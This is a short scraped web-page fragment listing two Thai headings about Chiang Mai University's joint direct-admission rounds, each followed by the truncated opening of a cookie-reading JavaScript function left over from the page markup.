รับตรงร่วมกัน ม.เชียงใหม่ 26 คณะ

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…

รับตรง 61 ม.เชียงใหม่ รอบที่ 3 (การรับตรงร่วมกัน)

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…